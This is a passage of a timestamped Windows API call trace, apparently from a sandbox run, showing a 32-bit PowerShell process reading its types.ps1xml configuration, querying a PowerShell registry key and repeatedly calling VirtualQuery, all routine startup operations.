GetFileType (hFile=0x358) returned 0x1 [0089.505] SetErrorMode (uMode=0x1) returned 0x1 [0089.505] GetFileType (hFile=0x358) returned 0x1 [0089.506] ReadFile (in: hFile=0x358, lpBuffer=0x2cf0b2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e604, lpOverlapped=0x0 | out: lpBuffer=0x2cf0b2c*, lpNumberOfBytesRead=0x13e604*=0x1000, lpOverlapped=0x0) returned 1 [0089.507] GetLastError () returned 0x0 [0089.507] ReadFile (in: hFile=0x358, lpBuffer=0x2cf0b2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e604, lpOverlapped=0x0 | out: lpBuffer=0x2cf0b2c*, lpNumberOfBytesRead=0x13e604*=0x1000, lpOverlapped=0x0) returned 1 [0089.507] GetLastError () returned 0x0 [0089.508] ReadFile (in: hFile=0x358, lpBuffer=0x2cf0b2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e604, lpOverlapped=0x0 | out: lpBuffer=0x2cf0b2c*, lpNumberOfBytesRead=0x13e604*=0x1000, lpOverlapped=0x0) returned 1 [0089.508] GetLastError () returned 0x0 [0089.508] ReadFile (in: hFile=0x358, lpBuffer=0x2cf0b2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e604, lpOverlapped=0x0 | out: lpBuffer=0x2cf0b2c*, lpNumberOfBytesRead=0x13e604*=0x1000, lpOverlapped=0x0) returned 1 [0089.508] GetLastError () returned 0x0 [0089.508] ReadFile (in: hFile=0x358, lpBuffer=0x2cf0b2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e604, lpOverlapped=0x0 | out: lpBuffer=0x2cf0b2c*, lpNumberOfBytesRead=0x13e604*=0x1000, lpOverlapped=0x0) returned 1 [0089.508] GetLastError () returned 0x0 [0089.509] ReadFile (in: hFile=0x358, lpBuffer=0x2cf0b2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e604, lpOverlapped=0x0 | out: lpBuffer=0x2cf0b2c*, lpNumberOfBytesRead=0x13e604*=0x1000, lpOverlapped=0x0) returned 1 [0089.509] GetLastError () returned 0x0 [0089.509] ReadFile (in: hFile=0x358, lpBuffer=0x2cf0b2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e604, lpOverlapped=0x0 | out: lpBuffer=0x2cf0b2c*, lpNumberOfBytesRead=0x13e604*=0x1000, lpOverlapped=0x0) returned 1 [0089.509] GetLastError () returned 0x0 [0089.509] ReadFile (in: hFile=0x358, lpBuffer=0x2cf0b2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e604, lpOverlapped=0x0 | out: lpBuffer=0x2cf0b2c*, lpNumberOfBytesRead=0x13e604*=0x1000, lpOverlapped=0x0) returned 1 [0089.509] GetLastError () returned 0x0 [0089.509] ReadFile (in: hFile=0x358, lpBuffer=0x2cf0b2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e604, lpOverlapped=0x0 | out: lpBuffer=0x2cf0b2c*, lpNumberOfBytesRead=0x13e604*=0x1000, lpOverlapped=0x0) returned 1 [0089.509] GetLastError () returned 0x0 [0089.510] ReadFile (in: hFile=0x358, lpBuffer=0x2cf0b2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e604, lpOverlapped=0x0 | out: lpBuffer=0x2cf0b2c*, lpNumberOfBytesRead=0x13e604*=0x1000, lpOverlapped=0x0) returned 1 [0089.510] GetLastError () returned 0x0 [0089.510] ReadFile (in: hFile=0x358, lpBuffer=0x2cf0b2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e604, lpOverlapped=0x0 | out: lpBuffer=0x2cf0b2c*, lpNumberOfBytesRead=0x13e604*=0x1000, lpOverlapped=0x0) returned 1 [0089.510] GetLastError () returned 0x0 [0089.511] ReadFile (in: hFile=0x358, lpBuffer=0x2cf0b2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e604, lpOverlapped=0x0 | out: lpBuffer=0x2cf0b2c*, lpNumberOfBytesRead=0x13e604*=0x1000, lpOverlapped=0x0) returned 1 [0089.511] GetLastError () returned 0x0 [0089.511] ReadFile (in: hFile=0x358, lpBuffer=0x2cf0b2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e604, lpOverlapped=0x0 | out: lpBuffer=0x2cf0b2c*, lpNumberOfBytesRead=0x13e604*=0x1000, lpOverlapped=0x0) returned 1 [0089.511] GetLastError () returned 0x0 [0089.511] ReadFile (in: hFile=0x358, lpBuffer=0x2cf0b2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e604, lpOverlapped=0x0 | out: lpBuffer=0x2cf0b2c*, lpNumberOfBytesRead=0x13e604*=0x1000, lpOverlapped=0x0) returned 1 [0089.511] GetLastError () returned 0x0 [0089.511] ReadFile (in: hFile=0x358, lpBuffer=0x2cf0b2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e604, lpOverlapped=0x0 | out: lpBuffer=0x2cf0b2c*, lpNumberOfBytesRead=0x13e604*=0x1000, lpOverlapped=0x0) returned 1 [0089.511] GetLastError () returned 0x0 [0089.511] ReadFile (in: hFile=0x358, lpBuffer=0x2cf0b2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e604, lpOverlapped=0x0 | out: lpBuffer=0x2cf0b2c*, lpNumberOfBytesRead=0x13e604*=0x1000, lpOverlapped=0x0) returned 1 [0089.511] GetLastError () returned 0x0 [0089.511] ReadFile (in: hFile=0x358, lpBuffer=0x2cf0b2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e604, lpOverlapped=0x0 | out: lpBuffer=0x2cf0b2c*, lpNumberOfBytesRead=0x13e604*=0x1000, lpOverlapped=0x0) returned 1 [0089.511] GetLastError () returned 0x0 [0089.513] ReadFile (in: hFile=0x358, lpBuffer=0x2cf0b2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e604, lpOverlapped=0x0 | out: lpBuffer=0x2cf0b2c*, lpNumberOfBytesRead=0x13e604*=0x1000, lpOverlapped=0x0) returned 1 [0089.513] GetLastError () returned 0x0 [0089.513] ReadFile (in: hFile=0x358, lpBuffer=0x2cf0b2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e604, lpOverlapped=0x0 | out: lpBuffer=0x2cf0b2c*, lpNumberOfBytesRead=0x13e604*=0x1000, lpOverlapped=0x0) returned 1 [0089.513] GetLastError () returned 0x0 [0089.513] ReadFile (in: hFile=0x358, lpBuffer=0x2cf0b2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e604, lpOverlapped=0x0 | out: lpBuffer=0x2cf0b2c*, lpNumberOfBytesRead=0x13e604*=0x1000, lpOverlapped=0x0) returned 1 [0089.514] GetLastError () returned 0x0 [0089.514] ReadFile (in: hFile=0x358, lpBuffer=0x2cf0b2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e604, lpOverlapped=0x0 | out: lpBuffer=0x2cf0b2c*, lpNumberOfBytesRead=0x13e604*=0x1000, lpOverlapped=0x0) returned 1 [0089.514] GetLastError () returned 0x0 [0089.514] ReadFile (in: hFile=0x358, lpBuffer=0x2cf0b2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e604, lpOverlapped=0x0 | out: lpBuffer=0x2cf0b2c*, lpNumberOfBytesRead=0x13e604*=0x1000, lpOverlapped=0x0) returned 1 [0089.514] GetLastError () returned 0x0 [0089.514] ReadFile (in: hFile=0x358, lpBuffer=0x2cf0b2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e604, lpOverlapped=0x0 | out: lpBuffer=0x2cf0b2c*, lpNumberOfBytesRead=0x13e604*=0x1000, lpOverlapped=0x0) returned 1 [0089.514] GetLastError () returned 0x0 [0089.514] ReadFile (in: hFile=0x358, lpBuffer=0x2cf0b2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e604, lpOverlapped=0x0 | out: lpBuffer=0x2cf0b2c*, lpNumberOfBytesRead=0x13e604*=0x1000, lpOverlapped=0x0) returned 1 [0089.514] GetLastError () returned 0x0 [0089.514] ReadFile (in: hFile=0x358, lpBuffer=0x2cf0b2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e604, lpOverlapped=0x0 | out: lpBuffer=0x2cf0b2c*, lpNumberOfBytesRead=0x13e604*=0x1000, lpOverlapped=0x0) returned 1 [0089.514] GetLastError () returned 0x0 [0089.515] ReadFile (in: hFile=0x358, lpBuffer=0x2cf0b2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e604, lpOverlapped=0x0 | out: lpBuffer=0x2cf0b2c*, lpNumberOfBytesRead=0x13e604*=0x1000, lpOverlapped=0x0) returned 1 [0089.515] GetLastError () returned 0x0 [0089.515] ReadFile (in: hFile=0x358, lpBuffer=0x2cf0b2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e604, lpOverlapped=0x0 | out: lpBuffer=0x2cf0b2c*, lpNumberOfBytesRead=0x13e604*=0x1000, lpOverlapped=0x0) returned 1 [0089.515] GetLastError () returned 0x0 [0089.515] ReadFile (in: hFile=0x358, lpBuffer=0x2cf0b2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e604, lpOverlapped=0x0 | out: lpBuffer=0x2cf0b2c*, lpNumberOfBytesRead=0x13e604*=0x1000, lpOverlapped=0x0) returned 1 [0089.515] GetLastError () returned 0x0 [0089.515] ReadFile (in: hFile=0x358, lpBuffer=0x2cf0b2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e604, lpOverlapped=0x0 | out: lpBuffer=0x2cf0b2c*, lpNumberOfBytesRead=0x13e604*=0x1000, lpOverlapped=0x0) returned 1 [0089.515] GetLastError () returned 0x0 [0089.515] ReadFile (in: hFile=0x358, lpBuffer=0x2cf0b2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e604, lpOverlapped=0x0 | out: lpBuffer=0x2cf0b2c*, lpNumberOfBytesRead=0x13e604*=0x1000, lpOverlapped=0x0) returned 1 [0089.515] GetLastError () returned 0x0 [0089.515] ReadFile (in: hFile=0x358, lpBuffer=0x2cf0b2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e604, lpOverlapped=0x0 | out: lpBuffer=0x2cf0b2c*, lpNumberOfBytesRead=0x13e604*=0x1000, lpOverlapped=0x0) returned 1 [0089.515] GetLastError () returned 0x0 [0089.516] ReadFile (in: hFile=0x358, lpBuffer=0x2cf0b2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e604, lpOverlapped=0x0 | out: lpBuffer=0x2cf0b2c*, lpNumberOfBytesRead=0x13e604*=0x1000, lpOverlapped=0x0) returned 1 [0089.516] GetLastError () returned 0x0 [0089.516] ReadFile (in: hFile=0x358, lpBuffer=0x2cf0b2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e604, lpOverlapped=0x0 | out: lpBuffer=0x2cf0b2c*, lpNumberOfBytesRead=0x13e604*=0x1000, lpOverlapped=0x0) returned 1 [0089.516] GetLastError () returned 0x0 [0089.518] ReadFile (in: hFile=0x358, lpBuffer=0x2cf0b2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e604, lpOverlapped=0x0 | out: lpBuffer=0x2cf0b2c*, lpNumberOfBytesRead=0x13e604*=0x1000, lpOverlapped=0x0) returned 1 [0089.518] GetLastError () returned 0x0 [0089.519] ReadFile (in: hFile=0x358, lpBuffer=0x2cf0b2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e604, lpOverlapped=0x0 | out: lpBuffer=0x2cf0b2c*, lpNumberOfBytesRead=0x13e604*=0x1000, lpOverlapped=0x0) returned 1 [0089.519] GetLastError () returned 0x0 [0089.519] ReadFile (in: hFile=0x358, lpBuffer=0x2cf0b2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e604, lpOverlapped=0x0 | out: lpBuffer=0x2cf0b2c*, lpNumberOfBytesRead=0x13e604*=0x1000, lpOverlapped=0x0) returned 1 [0089.519] GetLastError () returned 0x0 [0089.519] ReadFile (in: hFile=0x358, lpBuffer=0x2cf0b2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e604, lpOverlapped=0x0 | out: lpBuffer=0x2cf0b2c*, lpNumberOfBytesRead=0x13e604*=0x1000, lpOverlapped=0x0) returned 1 [0089.519] GetLastError () returned 0x0 [0089.519] ReadFile (in: hFile=0x358, lpBuffer=0x2cf0b2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e604, lpOverlapped=0x0 | out: lpBuffer=0x2cf0b2c*, lpNumberOfBytesRead=0x13e604*=0x1000, lpOverlapped=0x0) returned 1 [0089.519] GetLastError () returned 0x0 [0089.519] ReadFile (in: hFile=0x358, lpBuffer=0x2cf0b2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e604, lpOverlapped=0x0 | out: lpBuffer=0x2cf0b2c*, lpNumberOfBytesRead=0x13e604*=0x1000, lpOverlapped=0x0) returned 1 [0089.519] GetLastError () returned 0x0 [0089.519] ReadFile (in: hFile=0x358, lpBuffer=0x2cf0b2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e604, lpOverlapped=0x0 | out: lpBuffer=0x2cf0b2c*, lpNumberOfBytesRead=0x13e604*=0x1000, lpOverlapped=0x0) returned 1 [0089.519] GetLastError () returned 0x0 [0089.519] ReadFile (in: hFile=0x358, lpBuffer=0x2cf0b2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e604, lpOverlapped=0x0 | out: lpBuffer=0x2cf0b2c*, lpNumberOfBytesRead=0x13e604*=0x1000, lpOverlapped=0x0) returned 1 [0089.519] GetLastError () returned 0x0 [0089.519] ReadFile (in: hFile=0x358, lpBuffer=0x2cf0b2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e604, lpOverlapped=0x0 | out: lpBuffer=0x2cf0b2c*, lpNumberOfBytesRead=0x13e604*=0x1b4, lpOverlapped=0x0) returned 1 [0089.519] GetLastError () returned 0x0 [0089.519] ReadFile (in: hFile=0x358, lpBuffer=0x2cf0b2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e604, lpOverlapped=0x0 | out: lpBuffer=0x2cf0b2c*, lpNumberOfBytesRead=0x13e604*=0x0, lpOverlapped=0x0) returned 1 [0089.519] GetLastError () returned 0x0 [0089.520] CloseHandle (hObject=0x358) returned 1 [0089.520] GetLastError () returned 0x0 [0089.520] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x13e164, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0089.520] GetLastError () returned 0x0 [0089.520] SetErrorMode (uMode=0x1) returned 0x1 [0089.520] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2d113bc | out: lpFileInformation=0x2d113bc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7c2d31c, ftCreationTime.dwHighDateTime=0x1c9ea11, ftLastAccessTime.dwLowDateTime=0xd7c2d31c, ftLastAccessTime.dwHighDateTime=0x1c9ea11, ftLastWriteTime.dwLowDateTime=0xd7c5347c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1 [0089.520] GetLastError () returned 0x0 [0089.520] SetErrorMode (uMode=0x1) returned 0x1 [0089.520] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x13e130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0089.520] GetLastError () returned 0x0 [0089.520] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e588 | out: phkResult=0x13e588*=0x358) returned 0x0 [0089.520] RegQueryValueExW (in: hKey=0x358, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x13e5d0, lpData=0x0, lpcbData=0x13e5cc*=0x0 | out: lpType=0x13e5d0*=0x1, lpData=0x0, lpcbData=0x13e5cc*=0x56) returned 0x0 [0089.520] RegQueryValueExW (in: hKey=0x358, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x13e5d0, lpData=0x3953b0, lpcbData=0x13e5cc*=0x56 | out: lpType=0x13e5d0*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x13e5cc*=0x56) returned 0x0 [0089.520] RegCloseKey (hKey=0x358) returned 0x0 [0089.520] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x13e130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0089.520] GetLastError () returned 0x0 [0089.520] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x13e0c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0089.520] GetLastError () returned 0x0 [0089.611] VirtualQuery (in: lpAddress=0x13d4c4, lpBuffer=0x13e4c4, dwLength=0x1c | out: lpBuffer=0x13e4c4*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.629] VirtualQuery (in: lpAddress=0x13d4c4, lpBuffer=0x13e4c4, dwLength=0x1c | out: lpBuffer=0x13e4c4*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.648] VirtualQuery (in: lpAddress=0x13d4c4, lpBuffer=0x13e4c4, dwLength=0x1c | out: lpBuffer=0x13e4c4*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.648] VirtualQuery (in: lpAddress=0x13d4c4, lpBuffer=0x13e4c4, dwLength=0x1c | out: lpBuffer=0x13e4c4*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.648] VirtualQuery (in: lpAddress=0x13d4c4, lpBuffer=0x13e4c4, dwLength=0x1c | out: lpBuffer=0x13e4c4*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.648] VirtualQuery (in: lpAddress=0x13d4c4, lpBuffer=0x13e4c4, dwLength=0x1c | out: lpBuffer=0x13e4c4*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.649] VirtualQuery (in: lpAddress=0x13d4c4, lpBuffer=0x13e4c4, dwLength=0x1c | out: lpBuffer=0x13e4c4*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.651] VirtualQuery (in: lpAddress=0x13d4c4, lpBuffer=0x13e4c4, dwLength=0x1c | out: lpBuffer=0x13e4c4*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.658] VirtualQuery (in: lpAddress=0x13d4c4, lpBuffer=0x13e4c4, dwLength=0x1c | out: lpBuffer=0x13e4c4*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.658] VirtualQuery (in: lpAddress=0x13d4c4, lpBuffer=0x13e4c4, dwLength=0x1c | out: lpBuffer=0x13e4c4*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.658] VirtualQuery (in: lpAddress=0x13d4c4, lpBuffer=0x13e4c4, dwLength=0x1c | out: lpBuffer=0x13e4c4*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.658] VirtualQuery (in: lpAddress=0x13d4c4, lpBuffer=0x13e4c4, dwLength=0x1c | out: lpBuffer=0x13e4c4*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.658] VirtualQuery (in: lpAddress=0x13d4c4, lpBuffer=0x13e4c4, dwLength=0x1c | out: lpBuffer=0x13e4c4*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.659] VirtualQuery (in: lpAddress=0x13d4c4, lpBuffer=0x13e4c4, dwLength=0x1c | out: lpBuffer=0x13e4c4*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.659] VirtualQuery (in: lpAddress=0x13d4c4, lpBuffer=0x13e4c4, dwLength=0x1c | out: lpBuffer=0x13e4c4*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.659] VirtualQuery (in: lpAddress=0x13d4c4, lpBuffer=0x13e4c4, dwLength=0x1c | out: lpBuffer=0x13e4c4*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.661] VirtualQuery (in: lpAddress=0x13d4c4, lpBuffer=0x13e4c4, dwLength=0x1c | out: lpBuffer=0x13e4c4*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.663] VirtualQuery (in: lpAddress=0x13d4c4, lpBuffer=0x13e4c4, dwLength=0x1c | out: lpBuffer=0x13e4c4*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.664] VirtualQuery (in: lpAddress=0x13d4c4, lpBuffer=0x13e4c4, dwLength=0x1c | out: lpBuffer=0x13e4c4*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.664] VirtualQuery (in: lpAddress=0x13d4c4, lpBuffer=0x13e4c4, dwLength=0x1c | out: lpBuffer=0x13e4c4*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.664] VirtualQuery (in: lpAddress=0x13d4c4, lpBuffer=0x13e4c4, dwLength=0x1c | out: lpBuffer=0x13e4c4*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.665] VirtualQuery (in: lpAddress=0x13d4c4, lpBuffer=0x13e4c4, dwLength=0x1c | out: lpBuffer=0x13e4c4*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.666] VirtualQuery (in: lpAddress=0x13d4c4, lpBuffer=0x13e4c4, dwLength=0x1c | out: lpBuffer=0x13e4c4*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.666] VirtualQuery (in: lpAddress=0x13d4c4, lpBuffer=0x13e4c4, dwLength=0x1c | out: lpBuffer=0x13e4c4*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.666] VirtualQuery (in: lpAddress=0x13d4c4, lpBuffer=0x13e4c4, dwLength=0x1c | out: lpBuffer=0x13e4c4*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.666] VirtualQuery (in: lpAddress=0x13d4c4, lpBuffer=0x13e4c4, dwLength=0x1c | out: lpBuffer=0x13e4c4*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.666] VirtualQuery (in: lpAddress=0x13d4c4, lpBuffer=0x13e4c4, dwLength=0x1c | out: lpBuffer=0x13e4c4*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.666] VirtualQuery (in: lpAddress=0x13d4c4, lpBuffer=0x13e4c4, dwLength=0x1c | out: lpBuffer=0x13e4c4*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.667] VirtualQuery (in: lpAddress=0x13d4c4, lpBuffer=0x13e4c4, dwLength=0x1c | out: lpBuffer=0x13e4c4*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.667] VirtualQuery (in: lpAddress=0x13d4c4, lpBuffer=0x13e4c4, dwLength=0x1c | out: lpBuffer=0x13e4c4*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.668] VirtualQuery (in: lpAddress=0x13d4c4, lpBuffer=0x13e4c4, dwLength=0x1c | out: lpBuffer=0x13e4c4*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.670] VirtualQuery (in: lpAddress=0x13d4c8, lpBuffer=0x13e4c8, dwLength=0x1c | out: lpBuffer=0x13e4c8*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.670] VirtualQuery (in: lpAddress=0x13d4c8, lpBuffer=0x13e4c8, dwLength=0x1c | out: lpBuffer=0x13e4c8*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.670] VirtualQuery (in: lpAddress=0x13d4c4, lpBuffer=0x13e4c4, dwLength=0x1c | out: lpBuffer=0x13e4c4*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.671] VirtualQuery (in: lpAddress=0x13d4c4, lpBuffer=0x13e4c4, dwLength=0x1c | out: lpBuffer=0x13e4c4*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.697] VirtualQuery (in: lpAddress=0x13d4c4, lpBuffer=0x13e4c4, dwLength=0x1c | out: lpBuffer=0x13e4c4*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.697] VirtualQuery (in: lpAddress=0x13d4c4, lpBuffer=0x13e4c4, dwLength=0x1c | out: lpBuffer=0x13e4c4*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.698] VirtualQuery (in: lpAddress=0x13d4c4, lpBuffer=0x13e4c4, dwLength=0x1c | out: lpBuffer=0x13e4c4*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.702] VirtualQuery (in: lpAddress=0x13d4c4, lpBuffer=0x13e4c4, dwLength=0x1c | out: lpBuffer=0x13e4c4*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, 